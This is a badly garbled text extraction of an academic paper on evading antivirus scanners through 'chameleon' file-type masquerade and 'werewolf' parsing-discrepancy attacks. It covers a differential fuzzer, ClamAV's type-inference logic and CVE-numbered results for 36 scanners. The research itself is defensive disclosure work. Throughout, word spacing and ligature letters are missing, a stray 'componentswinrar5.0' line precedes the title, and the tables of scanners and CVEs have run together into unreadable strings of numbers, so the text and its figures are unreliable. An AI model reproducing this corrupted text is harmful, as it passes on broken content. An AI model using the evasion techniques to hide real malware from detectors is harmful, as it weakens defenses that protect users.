componentswinrar5.0

AbusingFileProcessinginMalwareDetectorsforFunandProtSumanJanaandVitalyShmatikovTheUniversityofTexasatAustinAbstract—Wesystematicallydescribetwoclassesofevasionexploitsagainstautomatedmalwaredetectors.
Chameleonat-tacksconfusethedetectors'le-typeinferenceheuristics,whilewerewolfattacksexploitdiscrepanciesinformat-specicleparsingbetweenthedetectorsandactualoperatingsystemsandapplications.
Theseattacksdonotrelyonobfuscation,metamorphism,binarypacking,oranyotherchangestomaliciouscode.
Becausetheyenableeventhesimplest,easilydetectablevirusestoevadedetection,wearguethatlepro-cessinghasbecometheweakestlinkofmalwaredefense.
Usingacombinationofmanualanalysisandblack-boxdifferentialfuzzing,wediscovered45newevasionexploitsandtestedthemagainst36popularantivirusscanners,allofwhichprovedvulnerabletovariouschameleonandwerewolfattacks.
I.
INTRODUCTIONModernmalwaredetectorsemployavarietyofdetectiontechniques:scanningforinstancesofknownviruses,binaryreverse-engineering,behavioralanalysis,andmanyothers.
Beforeanyofthesetechniquescanbeappliedtoasuspiciousle,however,thedetectormust(1)determinethetypeofthele,and(2)dependingonthetype,analyzethele'smeta-dataandparsethele—forexample,extractthecontentsofanarchive,ndmacrosembeddedinadocument,orconstructacontiguousviewofexecutablecode.
Theimportanceofleprocessinggrowsasautomatedmalwaredefensemovesawayfromthehost,withantivirus(AV)scannersandintrusionpreventionsystemsinstalledatenterprisegatewaysandemailservers,increasingpopularityofcloud-basedmalwaredetectionservices,etc.
Network-andcloud-baseddeploymentsprotectmultiplehosts,provideearlydetectioncapabilitiesandbettervisibilityintonetwork-widetrends,andmakemaintenanceeasier.
Tobeeffective,however,remotelydeployeddetectorsmustbeabletopredicthoweachlewillbeprocessedatitsdestinationbytheoperatingsystemandapplications.
Inthispaper,wearguethatthe"semanticgap"betweenhowmalwaredetectorshandlelesandhowthesamelesareprocessedontheendhostsistheAchillesheelofmalwaredefense.
Weusethetermdetectorgenericallyforsignature-basedscanners,behavioralanalyzers,oranyothertoolthatparsesandanalyzessuspiciouslesonitsown,independentlyofthedestinationendhost.
Thevulnerabilitieswedescribeareunrelatedtoobfuscation,mutation,oranyotherwayofhidingmaliciousfunctionality.
Theyenableevenexact,unmodiedinstancesofmalware—primitiveand(otherwise)triviallydetectable,aswellasarbitrarilysophis-ticated—toevadedetectionsimplybecausethedetectorfailstocorrectlyprocesstheinfectedle.
Weintroducetwonewclassesofevasionexploitsagainstmalwaredetectors.
Therstischameleonattacks,whichtargetthediscrepanciesbetweentheheuristicsusedbydetectorstodeterminethetypeoftheleandthoseusedbytheendhosts.
Contrarytoacommonmisconception,neitherisbasedsolelyontheleextension,thusourattacksaremorecomplexthansimplyrenamingtheextension(thistrickdoesnotworkagainstmoderndetectors),norcantheybesolvedbyforcingaparticularextensionontoale.
Thesecondclassiswerewolfattacks,whichexploitthediscrepanciesintheparsingofexecutablesandapplication-specicformatsbetweenmalwaredetectorsandactualap-plicationsandoperatingsystems.
Weevaluated36popularAVscannersusingacombinationofmanualanalysisanddifferentialblack-boxfuzzing,anddiscovered45differentexploits.
Alltestedscannersprovedvulnerabletobothchameleonandwerewolfattacks.
WestressthattheproblemisnotspecictoAVscannersanddoesnotdependonknownweaknessesofsignature-basedscanningsuchastheinabilitytohandlemetamorphicmuta-tions.
Theactualvirusesusedinourtestingareextremelysimple.
Theydonotemployself-encryption,polymorphism,orobfuscation,yetchameleonandwerewolfattacksenablethemtopassundetectedthroughscannerswhosevirusdatabasescontaintheirexactcode.
Becauseleprocessingmusttakeplacebeforeactualmalwaredetection,moreelaboratedetectorsarevulnerable,too,aslongastheirle-processinglogicdiffers,howeverslightly,fromtheOSandapplicationsonanyoftheprotectedendhosts.
Theproblemisdeeperthantheanecdotallyknownin-abilityofAVsoftwaretoproperlyprocessarchiveformats.
Manymodernleformatsareeffectivelyarchivesindis-guise:forexample,MSOfcedocumentscontainexecutablemacros,CompiledHTMLHelp(CHM)containsHTMLles,etc.
Wediscoveredchameleonandwerewolfattacksagainstallleformatswetested,fromrelativelysimplearchivestoexecutableimagesandcomplexMSOfcedocu-mentformats.
Evasiontechniquesbasedoncodeobfuscationarewidelyknownandmanydefenseshavebeenproposed.
Incontrast,ourattacksinvolvechangesonlytothemeta-dataofinfectedlesandarethusdifferent,signicantlysimpler,andcomplementarytoobfuscation-basedevasion.
Whileeachindividualvulnerabilitymaybeeasytox,leprocessinginmalwaredetectorssuffersfromthousandsofsemanticdiscrepancies.
Itisverydifcultto"writeabetterparser"thatpreciselyreplicatesthele-parsingsemanticsofactualapplicationsandoperatingsystems:(1)manyformatsareunderspecied,thusdifferentapplicationsprocessthesameleindifferentandevencontradictoryways,allofwhichmustbereplicatedbythedetector;(2)replicatingthebehaviorofagivenparserishard—forexample,aftermanyyearsoftesting,therearestillhundredsofle-parsingdiscrepanciesbetweenOpenOfceandMSOfce[23,24]andbetweenthe"functionallyequivalent"implementationsofUnixutilities[7];(3)thedetectormustbebug-compatiblewithallapplications;(4)becauseapplicationsaredesignedtohandleevenmalformedles,theirparsingalgorithmsaremuchlooserthantheformatspecication,changefromversiontoversion,andhaveidiosyncratic,difcult-to-replicate,mutuallyincompatiblesemanticsforprocessingnon-compliantles,allofwhichmustbereplicatedbythedetector;(5)evenseemingly"safe"discrepancies—suchasattemptingtoanalyzeleswithinvalidchecksumswhenscanninganarchiveformalware—enableevasion.
Responsibledisclosure.
AllattacksdescribedinthispaperhavebeenreportedtothepublicthroughtheCommonVulnerabilitiesandExposures(CVE)database.
1Intherestofthispaper,werefertothembytheircandidateCVEnumbers(seeTablesIandII).
Thesenumberswerecurrentatthetimeofwriting,butmaychangeinthefuture.
II.
RELATEDWORKWeintroducechameleonandwerewolfattacksasageneric,pervasiveprobleminallautomatedmalwarede-tectorsanddemonstrate45distinctattackson36differentdetectors,exploitingsemanticgapsintheirprocessingofmanyarchiveandnon-archiveformats.
Withacoupleofexceptions(e.
g.
,aRARarchivemasqueradingasaWindowsexecutable,previouslymentionedin[2]),theattacksinthispaperarereportedanddescribedforthersttime.
ThereispriorevidenceofmalformedarchivelesevadingAVsoftware[2,3,10,18,38,39].
Theseanecdotesarelimitedtoarchiveformatsonlyanddonotdescribeconcreteattacks.
AlvarezandZollerbrieymentionthatmodernAVscannersneedtoparseavarietyofformats[2]andpointouttheimportanceofcorrectleparsingforpreventingdenialofservice[1].
Concretewerewolfattacksonthedetectors'parsinglogicfornon-archiveformatssuchasexecutablesandOfcedocumentshavebeenreportedinneitherresearchliterature,norfolklore.
Theseattackshaveespeciallyseriousrepercussionsbecausetheyarenotpreventedevenbyhost-basedon-accessscanning(seeSectionIX-A).
BufferoverowandotherattacksonAVsoftware,unre-latedtoleprocessing,arementionedin[36,37].
Chameleonattacks.
Chameleonattacksonle-typein-ferenceheuristicsaresuperciallysimilartoattackson1http://cve.
mitre.
org/content-snifngheuristicsinWebbrowsers[19,25,30].
Barthetal.
proposedprex-disjointcontentsignaturesasabrowser-baseddefenseagainstcontent-snifngattacks[4].
ThepremiseofthisdefenseisthatnolethatmatchestherstfewbytesofsomeformatshouldbeparsedasHTMLregardlessofitssubsequentcontent.
Prex-disjointsignaturesdonotprovidearobustdefenseagainstchameleonattacksonmalwaredetectors.
DetectorshandlemanymoreleformatsthanWebbrowsersand,crucially,theseformatscannotbecharacterizedsolelybytheirinitialbytes(e.
g.
,validTARarchivescanhavearbitrarycontentintheirrst254bytes,possiblyincludingsignaturesforotherletypes).
Therefore,theycannotbedescribedcompletelybyanysetofprex-disjointsignatures.
Othersemantic-gapattacks.
Chameleonandwerewolfattacksareaninstanceofageneralclassof"semantic-gap"attackswhichexploitdifferentviewsofthesameobjectbythesecuritymonitorandtheactualsystem.
Thegapdescribedinthispaper—themonitor's(mis)understandingofthetypeandstructureofsuspiciousles—receivedmuchlessattentionthanotherevasionvectorsagainstAVscannersandintrusiondetectionsystems[16,27,31]andmayverywellbetheweakestlinkofmalwaredefense.
Other,complementaryevasiontechniquesexploitnet-workingprotocols(e.
g.
,splitmalwareintomultiplepackets),obfuscatemalwareusingmutationorpacking[20],or,inthecaseofmaliciousJavaScript,obfuscateitinHTML,Flash,andPDFcontent.
Forexample,PorstshowedhowtoobfuscatescriptssothattheyarenotrecognizedbyAVscannersbutparsedcorrectlybytheAdobereader[26].
HTMLparsingisnotoriouslytricky[28],andcross-sitescriptingcanexploitHTML-parsingdiscrepanciesbetweenbrowsersandsanitizationroutines[5,35].
Incontrast,weshowhowthemostprimitiveviruses,whicharepresentinstandardvirusdatabasesanddonotuseanyobfuscation,canevadedetectionbyexploitingdiscrepanciesintheprocessingofevenbasicleformatssuchasTARandPE.
Anentirelydifferentkindofsemanticgapisexploitedby"split-personality"malware,whosebehaviorvariesbetweenmonitoredandunmonitoredenvironments[8].
Suchmalwarecontainscodethattriestodetectvirtualization,emulation,and/orinstrumentationlibraries.
Incontrast,ourattacksarecompletelypassive,requirenoactivecodewhatsoever,andtargetadifferentfeatureofmalwaredetectionsystems.
Semantic-gapattacksonsystem-callinterpositionexploitthegapbetweenthemonitor'sandtheOS'sviewsofsystem-callarguments[12,34].
Theseattackstypicallyinvolveconcurrencyandarefundamentallydifferentfromtheattacksdescribedinthispaper.
Programdifferencing.
Brumleyetal.
proposedtoauto-maticallydetectdiscrepanciesbetweendifferentimplemen-tationsofthesameprotocolspecicationbyconvertingexecutiontracesintosymbolicformulasandcomparingTableITESTEDAVSCANNERS.
AVnumberNameAVnumberNameAVnumberName1ClamAV0.
96.
42Rising22.
83.
00.
033CAT-QuickHeal11.
004GData215Symantec20101.
3.
0.
1036Command5.
2.
11.
57IkarusT3.
1.
1.
97.
08Emsisoft5.
1.
0.
19PCTools7.
0.
3.
510F-Prot4.
6.
2.
11711VirusBuster13.
6.
151.
012Fortinent4.
2.
254.
013Antiy-AVL2.
0.
3.
714K7AntiVirus9.
77.
356515TrendMicro-HouseCall9.
120.
0.
100416Kaspersky7.
0.
0.
12517Jiangmin13.
0.
90018Microsoft1.
640219Sophos4.
61.
020NOD32579521AntiVir7.
11.
1.
16322Norman6.
06.
1223McAfee5.
400.
0.
115824Panda10.
0.
2.
725McAfee-GW-Edition2010.
1C26TrendMicro9.
120.
0.
100427Comodo742428BitDefender7.
229eSafe7.
0.
17.
030F-Secure9.
0.
16160.
031nProtect2011-01-17.
0132AhnLab-V32011.
01.
18.
0033AVG10.
0.
0.
119034Avast4.
8.
1351.
035Avast55.
0.
677.
036VBA323.
12.
14.
2TableIIAFFECTEDAVSCANNERSFOREACHREPORTEDATTACK.
CVEVulnerablescannersCVEVulnerablescannersCVEVulnerablescanners2012-14191,32012-14202,3,6,10,12,14,16,18,20,22,242012-14212,3,5,222012-14222,3,20,222012-14232,6,7,8,9,10,11,12,14,20,222012-14243,9,13,17,19,222012-14253,5,7,8,9,13,15,16,17,20,21,22,23,25,262012-14262,3,6,10,14,222012-14273,19,222012-14283,19,222012-14297,8,23,25,27,28,29,30,312012-14302,19,23,25,27,28,29,30,312012-14312,6,10,19,25,27,28,29,30,312012-14327,8,24,292012-14337,8,24,29,322012-14347,8,24,322012-14357,8,24,29,322012-14367,8,24,29,322012-1437272012-143819,272012-14392,24,292012-144022,24,292012-1441292012-14422,3,13,16,19,23,24,25,29,302012-14431,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,19,20,21,22,23,24,25,26,27,28,29,30,32,33,34,35,362012-144424,292012-14452,24,292012-14462,3,5,9,13,16,19,22,23,24,25,292012-144724,292012-14483,7,8,262012-14492,202012-14507,8,192012-14517,82012-14523,7,82012-14532,7,8,13,15,16,18,19,23,24,25,262012-14542,23,24,25,292012-14552,202012-14562,3,5,7,8,10,12,15,16,17,19,20,22,23,24,25,26,27,29,332012-14571,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,20,21,22,23,25,26,28,29,33,34,35,362012-14581,192012-14591,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,30,31,32,33,34,35,362012-14603,6,10,13,14,17,29,362012-14612,5,6,7,8,12,14,15,16,17,19,20,22,23,25,26,28,30,33,362012-14623,5,7,8,12,16,17,19,22,29,32,332012-14633,6,10,22,23,24,27,28,29,30,31,32themusingSMTsolvers[6].
Unfortunately,thisapproachdoesnotappeartobefeasibleforautomaticallydiscoveringchameleonandwerewolfattacks.
TheprogramstestedbyBrumleyetal.
implementsimpleprotocolslikeHTTPandtheirparsingcodeisveryshallow,i.
e.
,itliesclosetotheprogram'sentrypoint.
Bycontrast,malwarescannersandapplicationsdomuchmorethanparsing:scannersloadvirussignatures,matchthemagainstthele,etc.
,whileapplicationsperformawidevarietyofoperationsbeforeandafterparsing.
Binarydifferencingmustbeappliedtotheparsingcodeonly,becausethenon-parsingfunctionalitiesofmalwaredetectorsandapplicationsarecompletelydifferent.
Thisrequiresextractingtheparsingcodefromtheclosed-sourcebinariesofbothdetectorsandapplications,whichisextremelydifcult.
Furthermore,bothparsersmusthavethesameinterface,otherwisetheirnaloutputstatescannotbeeasilycompared.
Brumleyetal.
providenomethodforautomaticallyrecognizing,extracting,normalizing,andcomparingindividualpiecesoffunctionalityhiddendeepinsidethebinary.
Furthermore,thistechniquegeneratesformulasfromoneexecutionpathatatimeandislesslikelyndbugsinrarepaths.
Bycontrast,mostoftheattacksreportedinthispaper—forexample,theattackwhichconcatenatestwoseparatestreamsofgzippeddatatocreateasinglele—exploitbugsinunusualpathsthroughtheparsingcode.
BEKisanewlanguageandsystemforwritingandanalyzingstring-manipulatingsanitizersforWebapplica-tions[15].
BEKcancomparetwosanitizersforequivalenceandproduceacounter-exampleonwhichtheiroutputsdiffer.
TheBEKlanguageisspecicallytailoredforexpressingstringmanipulationoperationsandiscloselyrelatedtoregularexpressions.
Itisill-suitedforexpressingle-parsinglogic.
Forexample,itcannotvalidatedata-lengtheldsinleheadersandsimilarcontent-dependentformatelds.
Developmentofprogramanalysistechniquesforauto-mateddiscoveryofchameleonandwerewolfattacksisaninterestingtopicforfutureresearch.
III.
ATTACKINGFILEPROCESSINGFigure1showsthemaincomponentsofthele-processinglogicofantivirusscanners.
Thebasicpatternappliestootherautomated2malwaredetectors,bothbe-havioralandsignature-based,aslongastheyprocesslesindependentlyoftheendhost'sOSandapplications.
parsingFilePreprocessing+NormalizationSelectpartstoscanFindrelevantsignaturesInputfilematchingSignatureFiletypeinferenceFigure1.
Fileprocessinginantivirusscanners.
Therststepisle-typeinference.
Thescannermustinfertheletypeinorderto(1)parsethelecorrectlyand(2)scanitforthecorrectsubsetofvirussignatures.
Thesecondstepisleparsing.
Filesinsomeformatsmustbepreprocessedbeforescanning(forexample,thecon-tentsofanarchivemustbeextracted).
DocumentsinformatslikeHTMLcontainmanyirrelevantcharacters(forexample,whitespace)andmustbenormalized.
Inmostleformats,whetherexecutableorapplication-specic,blocksofdataareinterspersedwithmeta-data.
Forhigherperformance,malwarescannersparsethemeta-datainordertoidentifyandscanonlythepotentially"interesting"partsofthele.
Forexample,ascannermayparseanMSWorddocumenttondembeddedmacrosandotherexecutableobjectsandscanthemformacroviruses.
TodetectvirusesinLinuxELFexecutables,whichcancontainmultiplesections,thescannermustconstructacontiguousviewoftheexecutablecode.
Thisrequiresparsingthemeta-data(ELFheader)tondtheoffsetsandsizesofcodesections.
Chameleonandwerewolfattacks.
Wewillrefertoat-tacksthatexploitdiscrepanciesinle-typeinferenceas2Humanoperatorsmaybeabletomanuallypreventincorrectparsingandle-typeinference,butwidespreaddeploymentofhuman-assisteddetectorsisnotfeasibleforobviousscalabilityreasons.
chameleonattacksbecauseattacklesappearasonetypetothedetectorandasadifferenttypetotheactualOSorap-plication.
Wewillrefertoattacksthatexploitdiscrepanciesinparsingaswerewolfattacksbecauseattacklesappeartohavedifferentstructuredependingonwhethertheyareparsedbythedetectorortheapplication.
Chameleonandwerewolfattacksonlychangethemeta-dataofthele;thecontents,includingthemaliciouspay-load,arenotmodied(incontrasttocodeobfuscationandpolymorphism).
Theseattacks(1)startwithalethatisrecognizedasmaliciousbythedetector,(2)turnitintoalethatisnotrecognizedasmalicious,yet(3)themodiedleiscorrectlyprocessedbythedestinationapplicationor,inthecaseofexecutables,loadedbytheOS.
Ifthesamelecanbeprocessedbymultipleapplicationsorversionsofthesameapplication,weconsideranattacksuccessfulifatleastoneofthemprocessesthemodiedlecorrectly.
Fingerprintingmalwaredetectorsandlearningtheirlogic.
Becausele-typeinferenceheuristicsandle-parsinglogicvaryfromdetectortodetector,attacksaredetector-specicandithelpstoknowwhichdetectorisprotectingthetarget.
Thisknowledgeisoftenpublic—forexample,YahooMailscansallmessageswithSymantec'sNortonantivirus—buteveninblindtestingagainstGmail'sunknownscanner,twochameleonandonewerewolfattacks(CVE-2012-1438,2012-1443,and2012-1457)evadeddetection.
Unknowndetectorscanbeidentiedbytell-talesignsinbouncedmessages[22],orbyusingchameleonandwerewolfattacksthemselves.
AsTableIIshows,differentattacksworkagainstdifferentdetectors.
Bytryingseveralattacksandseeingwhichofthemevadedetection,theattackercaninferthemakeandmodelofthedetector.
Thelogicofopen-sourcedetectorslikeClamAVcanbelearnedbyanalyzingtheircode,butthevastmajorityofdetectorsareclosed-sourceandtheirlogicmustbelearnedbyfuzzingand/orbinaryanalysis.
Secrecyofthele-processinglogicisaweakdefense,however:wereportdozensofvulnerabilitiesincommercialscannersforwhichwedonothavethesourcecode,manyofthemdiscoveredautomaticallybyourblack-boxdifferentialfuzzer.
IV.
GENERATINGATTACKSTotestourattacks,weusedVirusTotal[32],afreeWebservicethatchecksanyleagainstmultipleantivirusscanners(43atthetimeofourtesting).
Severalscannerswerenotavailableatvarioustimesduetocrashes,thusforconsistencywepresenttheresultsforthe36scannersthatwerecontinuouslyavailable.
VirusTotalexecutesthecommand-lineversionsofallAVscannerswithmaximumprotectionandalldetectionmethodsenabled.
Wearguethatthisfaithfullymodelsthelevelofdefenseprovidedbynetwork-baseddetectors.
Bydesign,theydonotobservetheactualprocessingoflesonthehostandthusadvanceddetectiontechniques—forTableIIITESTEDAPPLICATIONS.
FiletypeTargetapplication(s)CABCabextract1.
2CHMMicrosoftHTMLHelp1.
xELFLinuxkernel(2.
6.
32)ELFloaderGZIPGzip1.
3.
12,FileRoller2.
30.
1.
1DOCMSOfce2007,OpenOfce3.
2PEWindowsVistaSP2PEloader,Wine1.
2.
2PEloaderRARRAR3.
90beta2TARGNUtar1.
22,FileRoller2.
30.
1.
17Z7-Zip9.
04betaexample,monitoringtheprogram'sexecutionforsignsofmaliciousbehavior—requirethedetectortoaccuratelyrec-ognizetheletype,parsethele,andreplicatethehost'sexecutionenvironment.
InSectionIX,weexplainwhythisischallengingtodocorrectly.
Attackswerealsoconrmedbytestingagainstthehost-basedversionsofAVsoftware,whereavailable.
WeusedvetoyvirusesfromVXHeavens[33]inourtests:EICAR,LinuxBlissandCassini,WindowsCecile,andMSWordABC.
Ifanexact,unobfuscatedinstanceofsuchabasicvirusevadesdetection,moresophisticatedmalwarewon'tbedetected,either.
Wecountanattackassuccessfulifthedetector(1)recognizestheinfectionintheoriginalle,but(2)nolongerrecognizesitinthemodiedle.
TargetapplicationsusedinourtestingaresummarizedinTableIII.
TheywereexecutedonlaptopsrunningLinuxUbuntu10.
04andWindowsVistaSP2.
Black-boxdifferentialfuzzing.
Tondwerewolfattacksautomatically,webuiltadifferentialfuzzingframeworkthatndsdiscrepanciesbetweentheparsinglogicofapplicationsandmalwaredetectors.
Becausethesourcecodeofdetectorsisrarelyavailable,ourframeworkisblack-box.
Itisimple-mentedinPythonandrunsonbothLinuxandWindows.
Thebasicframeworkisformat-independent,butformat-speciccomponentsareaddedasplugins.
Eachpluginprovidesaparser,anoutputvalidator,andafuzzer.
Theparserbreaksuptheformat-specicheaderintoanarrayof(name,offset,length)tuples,wherenameistheuniquenameofaheadereld,offsetisitslocationinthele,andlengthisitssize.
Thefuzzermodiesthecontentoftheeldsusingaformat-specicalgorithm.
Thevalidatorchecksiftheapplicationstillprocessesthemodiedlecorrectly.
Ourframeworktakesasinputtwoseedlesinthesameformat.
Oneleisparsedcorrectlybythedestinationapplication,theotherisaninfectedlerecognizedbythedetector.
Theframeworkusestheformat-specicfuzzertoautomaticallygeneratemodicationstotherstleandtheoutputvalidatortocheckiftheapplicationstillacceptsthele.
Ifamodicationisvalidated,theframeworkappliesittothesecond,infectedleandtestswhetherthedetectorstillrecognizestheinfection.
Thisapproachisbetterthandirectlymodifyingtheinfectedleandaccessingitonanendhostbecause(1)thehostmustbeisolated(e.
g.
,virtualized)ineachtesttopreventanactualinfection,imposingasignicantperformanceoverheadonthetestingframework,and(2)determiningifthemodiedinfectedleisacceptedbythedestinationapplicationisdifcultbecauseapplicationsareopaqueandhavecomplexsideeffects.
Amodicationisthusappliedtotheinfectedleonlyiftheapplication'sparsertoleratesit.
Iftheleisnolongerrecognizedasmalicious,adiscrepancybetweentheapplication'sandthedetector'sparsershasbeenfoundandanactualattackcanbegeneratedandveriedbyaccessingthemodiedinfectedleonasecure,isolatedhost.
Weconsideraninfectionveriediftheintactmalwarecodeisextractedfromthearchiveand/orloadedasanexecutable.
Asaproofofconcept,weimplementedsamplepluginsforMSCabinet(CAB),Windowsexecutable(PE),andLinuxexecutable(ELF)les.
Thefuzzerinthesepluginstriesasimplemodicationtothele'sheader,oneeldatatime:itincrementsthecontentofeacheld(ortherstbyteiftheeldspansmultiplebytes)by1;ifthisresultsinanoverow,itdecrementsthecontentby1.
Outputvalidatorsexecutedestinationapplicationsonmodiedseedlesandcheckthereturncodesandtheapplication'soutputforcorrectness.
OnceintegratedwithVirusTotal,ourfuzzingframeworkfounddozensofparsingbugsin21differentdetectors(TableXII).
Allresultinactualwerewolfattacks.
Ofcourse,oursimpleframeworkcannotndallparsingdiscrepancies.
Someparsingbugsarehiddeninrarelyex-ecutedpathswhichcanonlybereachedthroughspeciallycraftedinputs,requiringmanualguidancetothefuzzer.
Forexample,attacksinvolvingaconcatenationoftwogzippedstreamsoraheaderwithanincorrectchecksumwhoselengthismodiedtopointintothefollowingheader(seeSectionVI)aredifculttodiscoverbyautomatedfuzzing.
Anotherlimitationisthatourfuzzerdoesnotfully"under-stand"thedependenciesbetweendifferenteldsofformat-specicheadersandcannotautomaticallygeneratevalidlesifseveraleldsmustbechangedconsistently.
Forexample,iflelengthisincludedinaheadereld,thelemustbetruncatedoraugmentedwheneverthiseldismodied.
V.
CHAMELEONATTACKSChameleonattacksinvolvespeciallycraftedlesthatappearasonetypetothele-typeinferenceheuristicsusedbythemalwaredetectorbutasadifferenttypetotheOSorapplicationontheendhost.
Thesimplestchameleonattackistohidetheinfectedleinanarchiveofatypenotrecognizedbythedetector,causingittoapplygenericmalwaresignatureswithoutextractingthecontents.
Eventhisprimitiveattackissur-prisinglyeffective,asshownbyTableIV.
Intherestofthissection,wefocusonmoreinterestingchameleonattacksthatinvolvealeofonetypemasquerad-ingasaleofadifferenttype.
MasqueradeattackscauseTableIVSUPPORTFOR11ARCHIVEFORMATS:7ZIP,7ZIP-SFX,PACK,ISO,RAR,RAR(SFX),TAR.
LZOP,TAR.
LZMA,TAR.
RZ,TAR.
XZ,ARScannerUnsupportedformatsScannerUnsupportedformatsScannerUnsupportedformatsClamAV0.
96.
48Rising22.
83.
00.
039CAT-QuickHeal11.
009GData217Symantec20101.
3.
0.
10310Command5.
2.
11.
58IkarusT3.
1.
1.
97.
09Emsisoft5.
1.
0.
18PCTools7.
0.
3.
510F-Prot4.
6.
2.
1179VirusBuster13.
6.
151.
010Fortinent4.
2.
254.
09Antiy-AVL2.
0.
3.
78K7AntiVirus9.
77.
35659TrendMicro-HouseCall9.
120.
0.
100410Kaspersky7.
0.
0.
1255Jiangmin13.
0.
9009Microsoft1.
64026Sophos4.
61.
08NOD3257957AntiVir7.
11.
1.
1637Norman6.
06.
129McAfee5.
400.
0.
115810Panda10.
0.
2.
78McAfee-GW-Edition2010.
1C10TrendMicro9.
120.
0.
100410Comodo742411BitDefender7.
29eSafe7.
0.
17.
08F-Secure9.
0.
16160.
08nProtect2011-01-17.
0110AhnLab-V32011.
01.
18.
0010AVG10.
0.
0.
11909Avast4.
8.
1351.
07Avast55.
0.
677.
07VBA323.
12.
14.
29harminseveralways.
First,forefciency,detectorsusuallyapplyonlyasubsetofanalysistechniquesand/ormalwaresignaturestoanygivenletype.
Ifthedetectorisconfusedaboutthetype,itmayapplyawronganalysis.
Second,manyletypesrequirepreprocessing(e.
g.
,unpacking)beforetheycanbeanalyzed.
Aconfuseddetectormayapplyawrongpreprocessingornopreprocessingatall.
File-typeinferenceheuristics.
File-typeinferenceinmal-warescannersisnotbasedontheleextension.
EveniftheendhostrunsWindows,whichbydefaultreliesontheextensiontodeterminethele'stype,usersmayoverridethedefaultsanduseanyprogramtoopenanyle.
Therefore,alltestedscannersignoretheextensionandattempttodeterminetheactualtypeofthele.
Thesimpleattackofrenamingtheextensionthusdoesnotwork,butneitherdoesthesimpledefenseofhavingthescannerrewritetheextensiontomatchthele'sactualtype(seeSectionVII).
Toillustratele-typeinferenceheuristics,weuseCla-mAVv0.
95.
2,apopularopen-sourcescanner[9].
Thebasicprinciplesapplytootherdetectors,too,asevidencedbythesuccessofchameleonattacksagainstallofthem.
Formostletypes,ClamAVusesxed-offsetbyte-stringsignatures,butforcertaintypessuchasHTMLorself-extractingZIParchives,ClamAValsousesregular-expressionsignatures,describedlaterinthissection.
Fixed-offsetsignaturesaretuplesoftheform(offset,magic-content,length)whereoffsetdenotestheoffsetfromthebeginningofthelewhichistobecheckedforthisparticularletype,magic-contentisthesequenceofbytesstartingfromoffsetthatanyleofthistypeshouldhave,andlengthisthelength(inbytes)ofthatsequence.
SomeofClamAV'sle-typesignaturesareshowninTableXIIIintheappendix.
Forexample,ClamAV'ssignatureforELFexecutablesis(0,7f454c46,4),thusanylewhichhas7f454c46asitsrstfourbyteswillbeconsideredasanELFlebyClamAV.
Algorithm1showsasimpliedversionofClamAV'salgorithmforinferringtheletype.
Theorderofsignaturesinthelistmatters:onceClamAVndsamatch,itdoesnotcheckthelistanyfurther.
Inparticular,ifaxed-offsetAlgorithm1SimpliedpseudocodeofClamAV'sle-typeinferencealgorithm.
Readrst1024bytesofinputleintobufforeachxed-offsetle-typesignaturesinthespeciedorderdoif!
memcmp(buf+s.
offset,s.
magic-content,s.
length)thenifsisaletypetoignorethenreturnignoreelsereturns.
letypeendifendifendforCheckbufforregexle-typesignaturesusingAho-Corasickalgorithmifbufmatchesaregexsignaturerthenreturnr.
letypeelsereturnunknownletypeendifsignatureismatched,allregexsignaturesareignored.
Thisisexploitedbyoneofourattacks.
Fromversion0.
96onward,ClamAValsosupportsLLVMbytecodesignatures,typicallyusedtodetectpolymorphicmalwareinale-format-awaremanner.
Thesesignaturesareonlycheckedforspecicletypes,e.
g.
,asignatureregis-teringPDFHOOKDECLAREwillonlygetcheckediftheinferredletypeisPDF.
Therefore,thesesignaturesareextremelysusceptibletochameleonattacks.
Requirementsforle-typemasquerade.
LetAbethele'sactualtypeandletBbethefaketypethattheattackerwantsthedetectortoinfer.
Forthemasqueradetobesuccessful,threeconditionsmustholdforthele-typesignaturesSA(fortypeA)andSB(fortypeB):1)SAandSBdonotconict,i.
e.
,therearenoi,jsuchthat0≤ilength,0≤jlength,SA.
offset+i=SB.
offset+j,andTableVVULNERABLEFILE-TYPEPAIRSINCLAMAVRealtypeFaketypeRealtypeFaketypePOSIXTARmirc.
iniELFPOSIXTARPNGPOSIXTARELFJPEGGIFJPEGELFSISBMPJPEGMPEGPOSIXTARMP3POSIXTARJPEGPOSIXTARPNGJPEGBMPJPEGSA.
magic-content[i]=SB.
magic-content[j].
2)ThedetectormatchesSBbeforeSA.
3)DestinationOSorapplicationcorrectlyprocesseslesoftypeAcontainingbothSAandSB.
TherstconditionensuresthatthesamelemaycontainbothSAandSB,thesecondthatthedetectorinferstypeBforthelebeforeithasachancetoinfertypeA.
Inourtesting,wediscovered12le-typepairsthatsatisfyallthreeconditionsforClamAV(TableV).
Masqueradealoneisnotenough.
Evenifthedetectorinfersthewrongletype,itmaystilldetecttheinfectionbyscanningtheleasa"blob"orifthesignaturesasso-ciatedwiththeinferredtypecontainthevirus.
Thatsaid,masqueradeisagoodstartforexploringchameleonattacks.
TableVICHAMELEONATTACKSWITHEICAR-INFECTEDTARFILES.
ActualletypeFakeletypeNo.
ofvulnerableAVsCVEPOSIXTARmirc.
ini22012-1419POSIXTARELF112012-1420POSIXTARCAB42012-1421POSIXTARCHM42012-1422POSIXTARPE112012-1423POSIXTARSIS62012-1424POSIXTARPKZIP162012-1425POSIXTARBZip262012-1426POSIXTARWinZip32012-1427POSIXTARJPEG32012-1428TableVIICHAMELEONATTACKSWITHBLISS-INFECTEDELFFILES.
ActualletypeFakeletypeNo.
ofvulnerableAVsCVEELFPOSIXTAR92012-1429ELFSIS92012-1430ELFJPEG102012-1431TableVIIICHAMELEONATTACKSWITHCECILE-INFECTEDPEFILES.
ActualletypeFakeletypeNo.
ofvulnerableAVsCVEPEWinzip42012-1432PEJPEG52012-1433PESIS42012-1434PEPKLITE52012-1435PELZH52012-1436Resultsforchameleonattacks.
Ourdescriptionofle-typeinferencelogicfocusesonClamAVbecauseitsopen-sourcecodemakesiteasytoexplaintheheuristics.
File-typeTableIXCHAMELEONATTACKSFORABC-INFECTEDMSOFFICE97DOCFILES.
ActualletypeFakeletypeNo.
ofvulnerableAVsCVEMSOfcePKSFX12012-1437MSOfcePOSIXTAR22012-1438inferencebasedonmagicstringsisbynomeansuniquetoClamAV,however.
Alltestedscannersprovedvulnerabletomasquerade-basedchameleonattacks.
TheresultsaresummarizedinTableX;themasqueradepairsforeachattackandscannerareshowninTablesVI,VII,VIII,andIX.
